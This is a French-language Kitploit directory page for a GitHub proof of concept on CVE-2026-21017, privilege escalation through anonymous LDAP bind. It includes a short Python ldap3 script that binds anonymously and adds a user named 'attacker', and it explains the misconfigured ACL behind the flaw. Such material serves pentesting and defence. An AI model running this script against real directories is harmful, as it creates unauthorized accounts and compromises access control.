Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-21017-LDAP-Anonymous-Bind-Privilege-Escalation — Preuve de concept Python pour l'élévation de privilèges via bind LDAP anonyme, simulant des ACL non sécurisées afin de créer des utilisateurs administrateurs via des binds LDAP non authentifiés. | Kitploit
Outils/GitHubGitHub/george0papasotiriou/cve-2026-21017-ldap-anonymous-bind-privilege-escalation
Authentification et AutorisationEscalade de PrivilègesAnalyse des VulnérabilitésExploitationTests d'IntrusionMauvaise Configuration
GitHubgeorge0papasotiriou/cve-2026-21017-ldap-anonymous-bind-privilege-escalation

CVE-2026-21017-LDAP-Anonymous-Bind-Privilege-Escalation

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Preuve de concept Python pour l'élévation de privilèges via bind LDAP anonyme, simulant des ACL non sécurisées afin de créer des utilisateurs administrateurs via des binds LDAP non authentifiés.

Voir le dépôt
il y a 17 joursPas encore vérifié

CVE-2026-21017 – Élévation de privilèges par bind anonyme LDAP

Code du programme (Python ldap3 sim)

root@kitploit:~
# ldap_anon_sim.py - LDAP server allowing anonymous bind with write access
from ldap3 import Server, Connection, ALL

# Simulated: real server would be misconfigured
server = Server('ldap://localhost:389', get_info=ALL)
conn = Connection(server, authentication='ANONYMOUS')
conn.bind()
# If anonymous has write permission to userPassword, can add self as admin
conn.add('uid=attacker,ou=people,dc=example,dc=com', ['inetOrgPerson'], {'uid': 'attacker', 'userPassword': 'password'})
print("User created anonymously!")

CVE-2026-21017 – Élévation de privilèges par bind anonyme LDAP

Severity: Critical

Aperçu

Un annuaire LDAP est mal configuré : il autorise les binds anonymes et accorde également un accès en écriture à des attributs sensibles (comme userPassword). Un attaquant peut effectuer un bind anonyme et créer un nouvel utilisateur administrateur, ce qui lui permet d'élever ses privilèges.

Détails de la vulnérabilité

  • Type: Contrôle d'accès insuffisant
  • Impact: Compromission complète de l'annuaire.
  • Cause racine: La liste de contrôle d'accès (ACL) ne restreint pas les écritures aux utilisateurs authentifiés.

Démonstration de l'exploit

Exécutez la simulation (nécessite un serveur LDAP réel pour un test concret, mais nous montrons le concept) :

root@kitploit:~
python ldap_anon_sim.py

Le script tente d'ajouter un utilisateur de manière anonyme.

Télécharger l’outil